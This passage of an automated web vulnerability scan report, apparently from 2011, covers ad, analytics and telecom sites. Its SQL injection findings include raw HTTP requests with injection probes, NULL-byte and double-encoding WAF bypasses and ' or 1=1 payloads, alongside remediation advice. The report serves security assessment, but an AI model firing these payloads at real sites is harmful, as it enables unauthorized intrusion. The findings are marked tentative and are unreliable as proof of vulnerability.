24.32. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-

24.33. http://www.facebook.com/extern/login_status.php

24.34. http://www.google-analytics.com/__utm.gif

24.35. http://www.job-search-engine.com/keyword/number-portability/

24.36. http://www.linkedin.com/companyInsider

24.37. http://www.nanpa.org/forums/external.php

24.38. http://www.resourcenter.com/

24.39. http://www.secviz.org/node/89

24.40. http://www.stumbleupon.com/hostedbadge.php

24.41. http://www.vonage-forum.com/forum8.html

24.42. http://www.vonage.com/lp/US/afflpdc/

25. Cacheable HTTPS response

25.1. https://gvnwlnp.com/login.aspx

25.2. https://support.connexon.com/sd/AddSolution.sd

25.3. https://support.connexon.com/sd/Request.sd

25.4. https://support.connexon.com/sd/SolutionsHome.sd

25.5. https://www.nationalnanpa.com/nas/public/js/utilities.js

26. HTML does not specify charset

26.1. http://fls.doubleclick.net/activityi

26.2. https://lnp.activationnow.com/favicon.ico

26.3. http://nanpa.com/

26.4. http://nanpa.com/contact_us/mailing_list.html

26.5. http://nextelonline.nextel.com/tl/set_tl.html

26.6. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.7. http://shop2.sprint.com/en/support/faq/wlnp.shtml

26.8. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-

26.9. http://www.nationalnanpa.com/contact_us/index.cgi

26.10. http://www.nationalnanpa.com/contact_us/index.html

26.11. http://www.nationalnanpa.com/nas/public/js/utilities.js

26.12. http://www.nationalnanpa.com/number_resource_info/area_code_maps.html

26.13. https://www.nationalnanpa.com/nas/public/js/utilities.js

27. Content type incorrectly stated

27.1. http://anpisolutions.app4.hubspot.com/salog.js.aspx

27.2. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

27.3. http://mobilitypoint.westcon.com/favicon.ico

27.4. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.5. http://shop2.sprint.com/favicon.ico

27.6. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

27.7. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

27.8. http://support.sprint.com/favicon.ico

27.9. http://www.anpisolutions.com/wp-content/plugins/slidedeck-pro-for-wordpress/lib/slidedeck.jquery.js

27.10. http://www.anpisolutions.com/wp-content/uploads/favicon.ico

27.11. http://www.etalkup.com/formjsforoneutf8.aspx

27.12. http://www.etalkup.com/getpanelsdk.aspx

27.13. http://www.etalkup.com:8089/webclient/pagetrace

27.14. http://www.facebook.com/extern/login_status.php

27.15. http://www.google.com/mbd

27.16. http://www.google.com/search

27.17. http://www.linkedin.com/companyInsider

27.18. http://www.nanpa.org/forums/external.php

27.19. http://www.nationalnanpa.com/nas/public/assigned_code_query_step2.do

27.20. http://www.nationalnanpa.com/nas/public/js/utilities.js

27.21. https://www.nationalnanpa.com/nas/public/js/utilities.js

27.22. http://www.stumbleupon.com/hostedbadge.php

28. Content type is not specified



1. SQL injection
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [frm parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0%00'&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:59:14 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 9163

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<script>(function() {var f=function(e,b){var c=null,d=null;this.g=function(){var a=new Image(0,0);a.onload=a.onerror=a.onabort=function(){d=new Date};c=new Date;a.src=e};this.f=function(){if(c!=null&&d!=null)return[b,d-c].join("=");return b+"=-1"}},g=function(e,b,c){this.d=e;this.e=b;this.b=c;this.c=Math.floor(Math.
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0%00''&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:59:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4872

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [ga_sid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_sid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_sid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ga_sid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155%2527&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 01:01:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5947

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155%2527%2527&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 01:01:28 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1600

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:34:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:34:41 GMT
Server: Omniture DC/2.0.0
xserver: www612
Content-Length: 0
Content-Type: text/html


1.4. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:35:07 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:35:07 GMT
Server: Omniture DC/2.0.0
xserver: www617
Content-Length: 0
Content-Type: text/html


1.5. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do [codeQueryModel.stateAbbr parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nationalnanpa.com
Path:   /nas/public/assigned_code_query_step1.do

Issue detail

The codeQueryModel.stateAbbr parameter appears to be vulnerable to SQL injection attacks. The payloads 13320976'%20or%201%3d1--%20 and 13320976'%20or%201%3d2--%20 were each submitted in the codeQueryModel.stateAbbr parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

